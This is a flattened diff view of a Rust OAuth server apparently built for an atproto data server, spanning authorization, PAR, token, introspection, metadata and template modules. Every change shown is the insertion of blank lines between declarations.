url_encode(&format!("https://{}", pds_hostname)))); 602 redirect_url 603 } 604 + 605 #[derive(Debug, Serialize)] 606 pub struct AuthorizeDenyResponse { 607 pub error: String, 608 pub error_description: String, 609 } 610 + 611 pub async fn authorize_deny( 612 State(state): State<AppState>, 613 Form(form): Form<AuthorizeDenyForm>, ··· 627 } 628 Ok(Redirect::temporary(&redirect_url).into_response()) 629 } 630 + 631 #[derive(Debug, Deserialize)] 632 pub struct AuthorizeDenyForm { 633 pub request_uri: String, 634 } 635 + 636 #[derive(Debug, Deserialize)] 637 pub struct Authorize2faQuery { 638 pub request_uri: String, 639 pub channel: Option<String>, 640 } 641 + 642 #[derive(Debug, Deserialize)] 643 pub struct Authorize2faSubmit { 644 pub request_uri: String, 645 pub code: String, 646 } 647 + 648 const MAX_2FA_ATTEMPTS: i32 = 5; 649 + 650 pub async fn authorize_2fa_get( 651 State(state): State<AppState>, 652 Query(query): Query<Authorize2faQuery>, ··· 695 None, 696 )).into_response() 697 } 698 + 699 pub async fn authorize_2fa_post( 700 State(state): State<AppState>, 701 headers: HeaderMap,
+5
src/oauth/endpoints/metadata.rs
··· 2 use serde::{Deserialize, Serialize}; 3 use crate::state::AppState; 4 use crate::oauth::jwks::{JwkSet, create_jwk_set}; 5 #[derive(Debug, Serialize, Deserialize)] 6 pub struct ProtectedResourceMetadata { 7 pub resource: String, ··· 11 #[serde(skip_serializing_if = "Option::is_none")] 12 pub resource_documentation: Option<String>, 13 } 14 #[derive(Debug, Serialize, Deserialize)] 15 pub struct AuthorizationServerMetadata { 16 pub issuer: String, ··· 43 #[serde(skip_serializing_if = "Option::is_none")] 44 pub introspection_endpoint: Option<String>, 45 } 46 pub async fn oauth_protected_resource( 47 State(_state): State<AppState>, 48 ) -> Json<ProtectedResourceMetadata> { ··· 56 resource_documentation: Some("https://atproto.com".to_string()), 57 }) 58 } 59 pub async fn oauth_authorization_server( 60 State(_state): State<AppState>, 61 ) -> Json<AuthorizationServerMetadata> { ··· 96 introspection_endpoint: Some(format!("{}/oauth/introspect", issuer)), 97 }) 98 } 99 pub async fn oauth_jwks(State(_state): State<AppState>) -> Json<JwkSet> { 100 use crate::config::AuthConfig; 101 use crate::oauth::jwks::Jwk;
··· 2 use serde::{Deserialize, Serialize}; 3 use crate::state::AppState; 4 use crate::oauth::jwks::{JwkSet, create_jwk_set}; 5 + 6 #[derive(Debug, Serialize, Deserialize)] 7 pub struct ProtectedResourceMetadata { 8 pub resource: String, ··· 12 #[serde(skip_serializing_if = "Option::is_none")] 13 pub resource_documentation: Option<String>, 14 } 15 + 16 #[derive(Debug, Serialize, Deserialize)] 17 pub struct AuthorizationServerMetadata { 18 pub issuer: String, ··· 45 #[serde(skip_serializing_if = "Option::is_none")] 46 pub introspection_endpoint: Option<String>, 47 } 48 + 49 pub async fn oauth_protected_resource( 50 State(_state): State<AppState>, 51 ) -> Json<ProtectedResourceMetadata> { ··· 59 resource_documentation: Some("https://atproto.com".to_string()), 60 }) 61 } 62 + 63 pub async fn oauth_authorization_server( 64 State(_state): State<AppState>, 65 ) -> Json<AuthorizationServerMetadata> { ··· 100 introspection_endpoint: Some(format!("{}/oauth/introspect", issuer)), 101 }) 102 } 103 + 104 pub async fn oauth_jwks(State(_state): State<AppState>) -> Json<JwkSet> { 105 use crate::config::AuthConfig; 106 use crate::oauth::jwks::Jwk;
+1
src/oauth/endpoints/mod.rs
··· 2 pub mod par; 3 pub mod authorize; 4 pub mod token; 5 pub use metadata::*; 6 pub use par::*; 7 pub use authorize::*;
··· 2 pub mod par; 3 pub mod authorize; 4 pub mod token; 5 + 6 pub use metadata::*; 7 pub use par::*; 8 pub use authorize::*;
+6
src/oauth/endpoints/par.rs
··· 11 client::ClientMetadataCache, 12 db, 13 }; 14 const PAR_EXPIRY_SECONDS: i64 = 600; 15 const SUPPORTED_SCOPES: &[&str] = &["atproto", "transition:generic", "transition:chat.bsky"]; 16 #[derive(Debug, Deserialize)] 17 pub struct ParRequest { 18 pub response_type: String, ··· 37 #[serde(default)] 38 pub client_assertion_type: Option<String>, 39 } 40 #[derive(Debug, Serialize)] 41 pub struct ParResponse { 42 pub request_uri: String, 43 pub expires_in: u64, 44 } 45 pub async fn pushed_authorization_request( 46 State(state): State<AppState>, 47 headers: HeaderMap, ··· 115 expires_in: PAR_EXPIRY_SECONDS as u64, 116 })) 117 } 118 fn determine_client_auth(request: &ParRequest) -> Result<ClientAuth, OAuthError> { 119 if let (Some(assertion), Some(assertion_type)) = 120 (&request.client_assertion, &request.client_assertion_type) ··· 135 } 136 Ok(ClientAuth::None) 137 } 138 fn validate_scope( 139 requested_scope: &Option<String>, 140 client_metadata: &crate::oauth::client::ClientMetadata,
··· 11 client::ClientMetadataCache, 12 db, 13 }; 14 + 15 const PAR_EXPIRY_SECONDS: i64 = 600; 16 const SUPPORTED_SCOPES: &[&str] = &["atproto", "transition:generic", "transition:chat.bsky"]; 17 + 18 #[derive(Debug, Deserialize)] 19 pub struct ParRequest { 20 pub response_type: String, ··· 39 #[serde(default)] 40 pub client_assertion_type: Option<String>, 41 } 42 + 43 #[derive(Debug, Serialize)] 44 pub struct ParResponse { 45 pub request_uri: String, 46 pub expires_in: u64, 47 } 48 + 49 pub async fn pushed_authorization_request( 50 State(state): State<AppState>, 51 headers: HeaderMap, ··· 119 expires_in: PAR_EXPIRY_SECONDS as u64, 120 })) 121 } 122 + 123 fn determine_client_auth(request: &ParRequest) -> Result<ClientAuth, OAuthError> { 124 if let (Some(assertion), Some(assertion_type)) = 125 (&request.client_assertion, &request.client_assertion_type) ··· 140 } 141 Ok(ClientAuth::None) 142 } 143 + 144 fn validate_scope( 145 requested_scope: &Option<String>, 146 client_metadata: &crate::oauth::client::ClientMetadata,
+3
src/oauth/endpoints/token/grants.rs
··· 11 }; 12 use super::types::{TokenRequest, TokenResponse}; 13 use super::helpers::{create_access_token, verify_pkce}; 14 const ACCESS_TOKEN_EXPIRY_SECONDS: i64 = 3600; 15 const REFRESH_TOKEN_EXPIRY_DAYS: i64 = 60; 16 pub async fn handle_authorization_code_grant( 17 state: AppState, 18 _headers: HeaderMap, ··· 125 }), 126 )) 127 } 128 pub async fn handle_refresh_token_grant( 129 state: AppState, 130 _headers: HeaderMap,
··· 11 }; 12 use super::types::{TokenRequest, TokenResponse}; 13 use super::helpers::{create_access_token, verify_pkce}; 14 + 15 const ACCESS_TOKEN_EXPIRY_SECONDS: i64 = 3600; 16 const REFRESH_TOKEN_EXPIRY_DAYS: i64 = 60; 17 + 18 pub async fn handle_authorization_code_grant( 19 state: AppState, 20 _headers: HeaderMap, ··· 127 }), 128 )) 129 } 130 + 131 pub async fn handle_refresh_token_grant( 132 state: AppState, 133 _headers: HeaderMap,
+5
src/oauth/endpoints/token/helpers.rs
··· 6 use subtle::ConstantTimeEq; 7 use crate::config::AuthConfig; 8 use crate::oauth::OAuthError; 9 const ACCESS_TOKEN_EXPIRY_SECONDS: i64 = 3600; 10 pub struct TokenClaims { 11 pub jti: String, 12 pub exp: i64, 13 pub iat: i64, 14 } 15 pub fn verify_pkce(code_challenge: &str, code_verifier: &str) -> Result<(), OAuthError> { 16 let mut hasher = Sha256::new(); 17 hasher.update(code_verifier.as_bytes()); ··· 22 } 23 Ok(()) 24 } 25 pub fn create_access_token( 26 token_id: &str, 27 sub: &str, ··· 60 let signature_b64 = URL_SAFE_NO_PAD.encode(&signature); 61 Ok(format!("{}.{}", signing_input, signature_b64)) 62 } 63 pub fn extract_token_claims(token: &str) -> Result<TokenClaims, OAuthError> { 64 let parts: Vec<&str> = token.split('.').collect(); 65 if parts.len() != 3 {
··· 6 use subtle::ConstantTimeEq; 7 use crate::config::AuthConfig; 8 use crate::oauth::OAuthError; 9 + 10 const ACCESS_TOKEN_EXPIRY_SECONDS: i64 = 3600; 11 + 12 pub struct TokenClaims { 13 pub jti: String, 14 pub exp: i64, 15 pub iat: i64, 16 } 17 + 18 pub fn verify_pkce(code_challenge: &str, code_verifier: &str) -> Result<(), OAuthError> { 19 let mut hasher = Sha256::new(); 20 hasher.update(code_verifier.as_bytes()); ··· 25 } 26 Ok(()) 27 } 28 + 29 pub fn create_access_token( 30 token_id: &str, 31 sub: &str, ··· 64 let signature_b64 = URL_SAFE_NO_PAD.encode(&signature); 65 Ok(format!("{}.{}", signing_input, signature_b64)) 66 } 67 + 68 pub fn extract_token_claims(token: &str) -> Result<TokenClaims, OAuthError> { 69 let parts: Vec<&str> = token.split('.').collect(); 70 if parts.len() != 3 {
+5
src/oauth/endpoints/token/introspect.rs
··· 6 use crate::state::{AppState, RateLimitKind}; 7 use crate::oauth::{OAuthError, db}; 8 use super::helpers::extract_token_claims; 9 #[derive(Debug, Deserialize)] 10 pub struct RevokeRequest { 11 pub token: Option<String>, 12 #[serde(default)] 13 pub token_type_hint: Option<String>, 14 } 15 pub async fn revoke_token( 16 State(state): State<AppState>, 17 headers: HeaderMap, ··· 31 } 32 Ok(StatusCode::OK) 33 } 34 #[derive(Debug, Deserialize)] 35 pub struct IntrospectRequest { 36 pub token: String, 37 #[serde(default)] 38 pub token_type_hint: Option<String>, 39 } 40 #[derive(Debug, Serialize)] 41 pub struct IntrospectResponse { 42 pub active: bool, ··· 63 #[serde(skip_serializing_if = "Option::is_none")] 64 pub jti: Option<String>, 65 } 66 pub async fn introspect_token( 67 State(state): State<AppState>, 68 headers: HeaderMap,
··· 6 use crate::state::{AppState, RateLimitKind}; 7 use crate::oauth::{OAuthError, db}; 8 use super::helpers::extract_token_claims; 9 + 10 #[derive(Debug, Deserialize)] 11 pub struct RevokeRequest { 12 pub token: Option<String>, 13 #[serde(default)] 14 pub token_type_hint: Option<String>, 15 } 16 + 17 pub async fn revoke_token( 18 State(state): State<AppState>, 19 headers: HeaderMap, ··· 33 } 34 Ok(StatusCode::OK) 35 } 36 + 37 #[derive(Debug, Deserialize)] 38 pub struct IntrospectRequest { 39 pub token: String, 40 #[serde(default)] 41 pub token_type_hint: Option<String>, 42 } 43 + 44 #[derive(Debug, Serialize)] 45 pub struct IntrospectResponse { 46 pub active: bool, ··· 67 #[serde(skip_serializing_if = "Option::is_none")] 68 pub jti: Option<String>, 69 } 70 + 71 pub async fn introspect_token( 72 State(state): State<AppState>, 73 headers: HeaderMap,
+4
src/oauth/endpoints/token/mod.rs
··· 2 mod helpers; 3 mod introspect; 4 mod types; 5 use axum::{ 6 Form, Json, 7 extract::State, ··· 9 }; 10 use crate::state::{AppState, RateLimitKind}; 11 use crate::oauth::OAuthError; 12 pub use grants::{handle_authorization_code_grant, handle_refresh_token_grant}; 13 pub use helpers::{create_access_token, extract_token_claims, verify_pkce, TokenClaims}; 14 pub use introspect::{ 15 introspect_token, revoke_token, IntrospectRequest, IntrospectResponse, RevokeRequest, 16 }; 17 pub use types::{TokenRequest, TokenResponse}; 18 fn extract_client_ip(headers: &HeaderMap) -> String { 19 if let Some(forwarded) = headers.get("x-forwarded-for") { 20 if let Ok(value) = forwarded.to_str() { ··· 30 } 31 "unknown".to_string() 32 } 33 pub async fn token_endpoint( 34 State(state): State<AppState>, 35 headers: HeaderMap,
··· 2 mod helpers; 3 mod introspect; 4 mod types; 5 + 6 use axum::{ 7 Form, Json, 8 extract::State, ··· 10 }; 11 use crate::state::{AppState, RateLimitKind}; 12 use crate::oauth::OAuthError; 13 + 14 pub use grants::{handle_authorization_code_grant, handle_refresh_token_grant}; 15 pub use helpers::{create_access_token, extract_token_claims, verify_pkce, TokenClaims}; 16 pub use introspect::{ 17 introspect_token, revoke_token, IntrospectRequest, IntrospectResponse, RevokeRequest, 18 }; 19 pub use types::{TokenRequest, TokenResponse}; 20 + 21 fn extract_client_ip(headers: &HeaderMap) -> String { 22 if let Some(forwarded) = headers.get("x-forwarded-for") { 23 if let Ok(value) = forwarded.to_str() { ··· 33 } 34 "unknown".to_string() 35 } 36 + 37 pub async fn token_endpoint( 38 State(state): State<AppState>, 39 headers: HeaderMap,
+2
src/oauth/endpoints/token/types.rs
··· 1 use serde::{Deserialize, Serialize}; 2 #[derive(Debug, Deserialize)] 3 pub struct TokenRequest { 4 pub grant_type: String, ··· 19 #[serde(default)] 20 pub client_assertion_type: Option<String>, 21 } 22 #[derive(Debug, Serialize)] 23 pub struct TokenResponse { 24 pub access_token: String,
··· 1 use serde::{Deserialize, Serialize}; 2 + 3 #[derive(Debug, Deserialize)] 4 pub struct TokenRequest { 5 pub grant_type: String, ··· 20 #[serde(default)] 21 pub client_assertion_type: Option<String>, 22 } 23 + 24 #[derive(Debug, Serialize)] 25 pub struct TokenResponse { 26 pub access_token: String,
+5
src/oauth/error.rs
··· 4 response::{IntoResponse, Response}, 5 }; 6 use serde::Serialize; 7 #[derive(Debug)] 8 pub enum OAuthError { 9 InvalidRequest(String), ··· 20 InvalidToken(String), 21 RateLimited, 22 } 23 #[derive(Serialize)] 24 struct OAuthErrorResponse { 25 error: String, 26 error_description: Option<String>, 27 } 28 impl IntoResponse for OAuthError { 29 fn into_response(self) -> Response { 30 let (status, error, description) = match self { ··· 86 .into_response() 87 } 88 } 89 impl From<sqlx::Error> for OAuthError { 90 fn from(err: sqlx::Error) -> Self { 91 tracing::error!("Database error in OAuth flow: {}", err); 92 OAuthError::ServerError("An internal error occurred".to_string()) 93 } 94 } 95 impl From<anyhow::Error> for OAuthError { 96 fn from(err: anyhow::Error) -> Self { 97 tracing::error!("Internal error in OAuth flow: {}", err);
··· 4 response::{IntoResponse, Response}, 5 }; 6 use serde::Serialize; 7 + 8 #[derive(Debug)] 9 pub enum OAuthError { 10 InvalidRequest(String), ··· 21 InvalidToken(String), 22 RateLimited, 23 } 24 + 25 #[derive(Serialize)] 26 struct OAuthErrorResponse { 27 error: String, 28 error_description: Option<String>, 29 } 30 + 31 impl IntoResponse for OAuthError { 32 fn into_response(self) -> Response { 33 let (status, error, description) = match self { ··· 89 .into_response() 90 } 91 } 92 + 93 impl From<sqlx::Error> for OAuthError { 94 fn from(err: sqlx::Error) -> Self { 95 tracing::error!("Database error in OAuth flow: {}", err); 96 OAuthError::ServerError("An internal error occurred".to_string()) 97 } 98 } 99 + 100 impl From<anyhow::Error> for OAuthError { 101 fn from(err: anyhow::Error) -> Self { 102 tracing::error!("Internal error in OAuth flow: {}", err);
+3
src/oauth/jwks.rs
··· 1 use serde::{Deserialize, Serialize}; 2 #[derive(Debug, Clone, Serialize, Deserialize)] 3 pub struct JwkSet { 4 pub keys: Vec<Jwk>, 5 } 6 #[derive(Debug, Clone, Serialize, Deserialize)] 7 pub struct Jwk { 8 pub kty: String, ··· 19 #[serde(skip_serializing_if = "Option::is_none")] 20 pub y: Option<String>, 21 } 22 pub fn create_jwk_set(keys: Vec<Jwk>) -> JwkSet { 23 JwkSet { keys } 24 }
··· 1 use serde::{Deserialize, Serialize}; 2 + 3 #[derive(Debug, Clone, Serialize, Deserialize)] 4 pub struct JwkSet { 5 pub keys: Vec<Jwk>, 6 } 7 + 8 #[derive(Debug, Clone, Serialize, Deserialize)] 9 pub struct Jwk { 10 pub kty: String, ··· 21 #[serde(skip_serializing_if = "Option::is_none")] 22 pub y: Option<String>, 23 } 24 + 25 pub fn create_jwk_set(keys: Vec<Jwk>) -> JwkSet { 26 JwkSet { keys } 27 }
+1
src/oauth/mod.rs
··· 7 pub mod error; 8 pub mod templates; 9 pub mod verify; 10 pub use types::*; 11 pub use error::OAuthError; 12 pub use verify::{verify_oauth_access_token, generate_dpop_nonce, VerifyResult, OAuthUser, OAuthAuthError};
··· 7 pub mod error; 8 pub mod templates; 9 pub mod verify; 10 + 11 pub use types::*; 12 pub use error::OAuthError; 13 pub use verify::{verify_oauth_access_token, generate_dpop_nonce, VerifyResult, OAuthUser, OAuthAuthError};
+10
src/oauth/templates.rs
··· 1 use chrono::{DateTime, Utc}; 2 fn base_styles() -> &'static str { 3 r#" 4 :root { ··· 340 } 341 "# 342 } 343 pub fn login_page( 344 client_id: &str, 345 client_name: Option<&str>, ··· 411 login_hint_value = html_escape(login_hint_value), 412 ) 413 } 414 pub struct DeviceAccount { 415 pub did: String, 416 pub handle: String, 417 pub email: Option<String>, 418 pub last_used_at: DateTime<Utc>, 419 } 420 pub fn account_selector_page( 421 client_id: &str, 422 client_name: Option<&str>, ··· 482 request_uri_encoded = urlencoding::encode(request_uri), 483 ) 484 } 485 pub fn two_factor_page( 486 request_uri: &str, 487 channel: &str, ··· 539 error_html = error_html, 540 ) 541 } 542 pub fn error_page(error: &str, error_description: Option<&str>) -> String { 543 let description = error_description.unwrap_or("An error occurred during the authorization process."); 544 format!( ··· 570 description = html_escape(description), 571 ) 572 } 573 pub fn success_page(client_name: Option<&str>) -> String { 574 let client_display = client_name.unwrap_or("The application"); 575 format!( ··· 597 client_display = html_escape(client_display), 598 ) 599 } 600 fn html_escape(s: &str) -> String { 601 s.replace('&', "&amp;") 602 .replace('<', "&lt;") ··· 604 .replace('"', "&quot;") 605 .replace('\'', "&#39;") 606 } 607 fn get_initials(handle: &str) -> String { 608 let clean = handle.trim_start_matches('@'); 609 if clean.is_empty() { ··· 611 } 612 clean.chars().next().unwrap_or('?').to_uppercase().to_string() 613 } 614 pub fn mask_email(email: &str) -> String { 615 if let Some(at_pos) = email.find('@') { 616 let local = &email[..at_pos];
··· 1 use chrono::{DateTime, Utc}; 2 + 3 fn base_styles() -> &'static str { 4 r#" 5 :root { ··· 341 } 342 "# 343 } 344 + 345 pub fn login_page( 346 client_id: &str, 347 client_name: Option<&str>, ··· 413 login_hint_value = html_escape(login_hint_value), 414 ) 415 } 416 + 417 pub struct DeviceAccount { 418 pub did: String, 419 pub handle: String, 420 pub email: Option<String>, 421 pub last_used_at: DateTime<Utc>, 422 } 423 + 424 pub fn account_selector_page( 425 client_id: &str, 426 client_name: Option<&str>, ··· 486 request_uri_encoded = urlencoding::encode(request_uri), 487 ) 488 } 489 + 490 pub fn two_factor_page( 491 request_uri: &str, 492 channel: &str, ··· 544 error_html = error_html, 545 ) 546 } 547 + 548 pub fn error_page(error: &str, error_description: Option<&str>) -> String { 549 let description = error_description.unwrap_or("An error occurred during the authorization process."); 550 format!( ··· 576 description = html_escape(description), 577 ) 578 } 579 + 580 pub fn success_page(client_name: Option<&str>) -> String { 581 let client_display = client_name.unwrap_or("The application"); 582 format!( ··· 604 client_display = html_escape(client_display), 605 ) 606 } 607 + 608 fn html_escape(s: &str) -> String { 609 s.replace('&', "&amp;") 610 .replace('<', "&lt;") ··· 612 .replace('"', "&quot;") 613 .replace('\'', "&#39;") 614 } 615 + 616 fn get_initials(handle: &str) -> String { 617 let clean = handle.trim_start_matches('@'); 618 if clean.is_empty() { ··· 620 } 621 clean.chars().next().unwrap_or('?').to_uppercase().to_string() 622 } 623 + 624 pub fn mask_email(email: &str) -> String { 625 if let Some(at_pos) = email.find('@') { 626 let local = &email[..at_pos];
+27
src/oauth/types.rs
··· 1 use chrono::{DateTime, Utc}; 2 use serde::{Deserialize, Serialize}; 3 use serde_json::Value as JsonValue; 4 #[derive(Debug, Clone, Serialize, Deserialize)] 5 pub struct RequestId(pub String); 6 #[derive(Debug, Clone, Serialize, Deserialize)] 7 pub struct TokenId(pub String); 8 #[derive(Debug, Clone, Serialize, Deserialize)] 9 pub struct DeviceId(pub String); 10 #[derive(Debug, Clone, Serialize, Deserialize)] 11 pub struct SessionId(pub String); 12 #[derive(Debug, Clone, Serialize, Deserialize)] 13 pub struct Code(pub String); 14 #[derive(Debug, Clone, Serialize, Deserialize)] 15 pub struct RefreshToken(pub String); 16 impl RequestId { 17 pub fn generate() -> Self { 18 Self(format!("urn:ietf:params:oauth:request_uri:{}", uuid::Uuid::new_v4())) 19 } 20 } 21 impl TokenId { 22 pub fn generate() -> Self { 23 Self(uuid::Uuid::new_v4().to_string()) 24 } 25 } 26 impl DeviceId { 27 pub fn generate() -> Self { 28 Self(uuid::Uuid::new_v4().to_string()) 29 } 30 } 31 impl SessionId { 32 pub fn generate() -> Self { 33 Self(uuid::Uuid::new_v4().to_string()) 34 } 35 } 36 impl Code { 37 pub fn generate() -> Self { 38 use rand::Rng; ··· 43 )) 44 } 45 } 46 impl RefreshToken { 47 pub fn generate() -> Self { 48 use rand::Rng; ··· 53 )) 54 } 55 } 56 #[derive(Debug, Clone, Serialize, Deserialize)] 57 #[serde(tag = "method")] 58 pub enum ClientAuth { ··· 65 #[serde(rename = "private_key_jwt")] 66 PrivateKeyJwt { client_assertion: String }, 67 } 68 #[derive(Debug, Clone, Serialize, Deserialize)] 69 pub struct AuthorizationRequestParameters { 70 pub response_type: String, ··· 79 #[serde(flatten)] 80 pub extra: Option<JsonValue>, 81 } 82 #[derive(Debug, Clone)] 83 pub struct RequestData { 84 pub client_id: String, ··· 89 pub device_id: Option<String>, 90 pub code: Option<String>, 91 } 92 #[derive(Debug, Clone)] 93 pub struct DeviceData { 94 pub session_id: String, ··· 96 pub ip_address: String, 97 pub last_seen_at: DateTime<Utc>, 98 } 99 #[derive(Debug, Clone)] 100 pub struct TokenData { 101 pub did: String, ··· 112 pub current_refresh_token: Option<String>, 113 pub scope: Option<String>, 114 } 115 #[derive(Debug, Clone, Serialize, Deserialize)] 116 pub struct AuthorizedClientData { 117 pub scope: Option<String>, 118 pub remember: bool, 119 } 120 #[derive(Debug, Clone, Serialize, Deserialize)] 121 pub struct OAuthClientMetadata { 122 pub client_id: String, ··· 133 pub jwks_uri: Option<String>, 134 pub application_type: Option<String>, 135 } 136 #[derive(Debug, Clone, Serialize, Deserialize)] 137 pub struct ProtectedResourceMetadata { 138 pub resource: String, ··· 141 pub scopes_supported: Vec<String>, 142 pub resource_documentation: Option<String>, 143 } 144 #[derive(Debug, Clone, Serialize, Deserialize)] 145 pub struct AuthorizationServerMetadata { 146 pub issuer: String, ··· 159 pub dpop_signing_alg_values_supported: Option<Vec<String>>, 160 pub authorization_response_iss_parameter_supported: Option<bool>, 161 } 162 #[derive(Debug, Clone, Serialize, Deserialize)] 163 pub struct ParResponse { 164 pub request_uri: String, 165 pub expires_in: u64, 166 } 167 #[derive(Debug, Clone, Serialize, Deserialize)] 168 pub struct TokenResponse { 169 pub access_token: String, ··· 176 #[serde(skip_serializing_if = "Option::is_none")] 177 pub sub: Option<String>, 178 } 179 #[derive(Debug, Clone, Serialize, Deserialize)] 180 pub struct TokenRequest { 181 pub grant_type: String, ··· 186 pub client_id: Option<String>, 187 pub client_secret: Option<String>, 188 } 189 #[derive(Debug, Clone, Serialize, Deserialize)] 190 pub struct DPoPClaims { 191 pub jti: String, ··· 197 #[serde(skip_serializing_if = "Option::is_none")] 198 pub nonce: Option<String>, 199 } 200 #[derive(Debug, Clone, Serialize, Deserialize)] 201 pub struct JwkPublicKey { 202 pub kty: String, ··· 208 pub kid: Option<String>, 209 pub alg: Option<String>, 210 } 211 #[derive(Debug, Clone, Serialize, Deserialize)] 212 pub struct Jwks { 213 pub keys: Vec<JwkPublicKey>,
··· 1 use chrono::{DateTime, Utc}; 2 use serde::{Deserialize, Serialize}; 3 use serde_json::Value as JsonValue; 4 + 5 #[derive(Debug, Clone, Serialize, Deserialize)] 6 pub struct RequestId(pub String); 7 + 8 #[derive(Debug, Clone, Serialize, Deserialize)] 9 pub struct TokenId(pub String); 10 + 11 #[derive(Debug, Clone, Serialize, Deserialize)] 12 pub struct DeviceId(pub String); 13 + 14 #[derive(Debug, Clone, Serialize, Deserialize)] 15 pub struct SessionId(pub String); 16 + 17 #[derive(Debug, Clone, Serialize, Deserialize)] 18 pub struct Code(pub String); 19 + 20 #[derive(Debug, Clone, Serialize, Deserialize)] 21 pub struct RefreshToken(pub String); 22 + 23 impl RequestId { 24 pub fn generate() -> Self { 25 Self(format!("urn:ietf:params:oauth:request_uri:{}", uuid::Uuid::new_v4())) 26 } 27 } 28 + 29 impl TokenId { 30 pub fn generate() -> Self { 31 Self(uuid::Uuid::new_v4().to_string()) 32 } 33 } 34 + 35 impl DeviceId { 36 pub fn generate() -> Self { 37 Self(uuid::Uuid::new_v4().to_string()) 38 } 39 } 40 + 41 impl SessionId { 42 pub fn generate() -> Self { 43 Self(uuid::Uuid::new_v4().to_string()) 44 } 45 } 46 + 47 impl Code { 48 pub fn generate() -> Self { 49 use rand::Rng; ··· 54 )) 55 } 56 } 57 + 58 impl RefreshToken { 59 pub fn generate() -> Self { 60 use rand::Rng; ··· 65 )) 66 } 67 } 68 + 69 #[derive(Debug, Clone, Serialize, Deserialize)] 70 #[serde(tag = "method")] 71 pub enum ClientAuth { ··· 78 #[serde(rename = "private_key_jwt")] 79 PrivateKeyJwt { client_assertion: String }, 80 } 81 + 82 #[derive(Debug, Clone, Serialize, Deserialize)] 83 pub struct AuthorizationRequestParameters { 84 pub response_type: String, ··· 93 #[serde(flatten)] 94 pub extra: Option<JsonValue>, 95 } 96 + 97 #[derive(Debug, Clone)] 98 pub struct RequestData { 99 pub client_id: String, ··· 104 pub device_id: Option<String>, 105 pub code: Option<String>, 106 } 107 + 108 #[derive(Debug, Clone)] 109 pub struct DeviceData { 110 pub session_id: String, ··· 112 pub ip_address: String, 113 pub last_seen_at: DateTime<Utc>, 114 } 115 + 116 #[derive(Debug, Clone)] 117 pub struct TokenData { 118 pub did: String, ··· 129 pub current_refresh_token: Option<String>, 130 pub scope: Option<String>, 131 } 132 + 133 #[derive(Debug, Clone, Serialize, Deserialize)] 134 pub struct AuthorizedClientData { 135 pub scope: Option<String>, 136 pub remember: bool, 137 } 138 + 139 #[derive(Debug, Clone, Serialize, Deserialize)] 140 pub struct OAuthClientMetadata { 141 pub client_id: String, ··· 152 pub jwks_uri: Option<String>, 153 pub application_type: Option<String>, 154 } 155 + 156 #[derive(Debug, Clone, Serialize, Deserialize)] 157 pub struct ProtectedResourceMetadata { 158 pub resource: String, ··· 161 pub scopes_supported: Vec<String>, 162 pub resource_documentation: Option<String>, 163 } 164 + 165 #[derive(Debug, Clone, Serialize, Deserialize)] 166 pub struct AuthorizationServerMetadata { 167 pub issuer: String, ··· 180 pub dpop_signing_alg_values_supported: Option<Vec<String>>, 181 pub authorization_response_iss_parameter_supported: Option<bool>, 182 } 183 + 184 #[derive(Debug, Clone, Serialize, Deserialize)] 185 pub struct ParResponse { 186 pub request_uri: String, 187 pub expires_in: u64, 188 } 189 + 190 #[derive(Debug, Clone, Serialize, Deserialize)] 191 pub struct TokenResponse { 192 pub access_token: String, ··· 199 #[serde(skip_serializing_if = "Option::is_none")] 200 pub sub: Option<String>, 201 } 202 + 203 #[derive(Debug, Clone, Serialize, Deserialize)] 204 pub struct TokenRequest { 205 pub grant_type: String, ··· 210 pub client_id: Option<String>, 211 pub client_secret: Option<String>, 212 } 213 + 214 #[derive(Debug, Clone, Serialize, Deserialize)] 215 pub struct DPoPClaims { 216 pub jti: String, ··· 222 #[serde(skip_serializing_if = "Option::is_none")] 223 pub nonce: Option<String>, 224 } 225 + 226 #[derive(Debug, Clone, Serialize, Deserialize)] 227 pub struct JwkPublicKey { 228 pub kty: String, ··· 234 pub kid: Option<String>, 235 pub alg: Option<String>, 236 } 237 + 238 #[derive(Debug, Clone, Serialize, Deserialize)] 239 pub struct Jwks { 240 pub keys: Vec<JwkPublicKey>,
+14
src/oauth/verify.rs
··· 10 use sha2::Sha256; 11 use sqlx::PgPool; 12 use subtle::ConstantTimeEq; 13 use crate::config::AuthConfig; 14 use crate::state::AppState; 15 use super::db; 16 use super::dpop::DPoPVerifier; 17 use super::OAuthError; 18 pub struct OAuthTokenInfo { 19 pub did: String, 20 pub token_id: String, ··· 22 pub scope: Option<String>, 23 pub dpop_jkt: Option<String>, 24 } 25 pub struct VerifyResult { 26 pub did: String, 27 pub token_id: String, 28 pub client_id: String, 29 pub scope: Option<String>, 30 } 31 pub async fn verify_oauth_access_token( 32 pool: &PgPool, 33 access_token: &str, ··· 69 scope: token_data.scope, 70 }) 71 } 72 pub fn extract_oauth_token_info(token: &str) -> Result<OAuthTokenInfo, OAuthError> { 73 let parts: Vec<&str> = token.split('.').collect(); 74 if parts.len() != 3 { ··· 141 dpop_jkt, 142 }) 143 } 144 fn compute_ath(access_token: &str) -> String { 145 use sha2::Digest; 146 let mut hasher = Sha256::new(); ··· 148 let hash = hasher.finalize(); 149 URL_SAFE_NO_PAD.encode(&hash) 150 } 151 pub fn generate_dpop_nonce() -> String { 152 let config = AuthConfig::get(); 153 let verifier = DPoPVerifier::new(config.dpop_secret().as_bytes()); 154 verifier.generate_nonce() 155 } 156 pub struct OAuthUser { 157 pub did: String, 158 pub client_id: Option<String>, 159 pub scope: Option<String>, 160 pub is_oauth: bool, 161 } 162 pub struct OAuthAuthError { 163 pub status: StatusCode, 164 pub error: String, 165 pub message: String, 166 pub dpop_nonce: Option<String>, 167 } 168 impl IntoResponse for OAuthAuthError { 169 fn into_response(self) -> Response { 170 let mut response = ( ··· 184 response 185 } 186 } 187 impl FromRequestParts<AppState> for OAuthUser { 188 type Rejection = OAuthAuthError; 189 async fn from_request_parts(parts: &mut Parts, state: &AppState) -> Result<Self, Self::Rejection> { 190 let auth_header = parts 191 .headers ··· 258 } 259 } 260 } 261 struct LegacyAuthResult { 262 did: String, 263 } 264 async fn try_legacy_auth(pool: &PgPool, token: &str) -> Result<LegacyAuthResult, ()> { 265 match crate::auth::validate_bearer_token(pool, token).await { 266 Ok(user) if !user.is_oauth => Ok(LegacyAuthResult { did: user.did }),
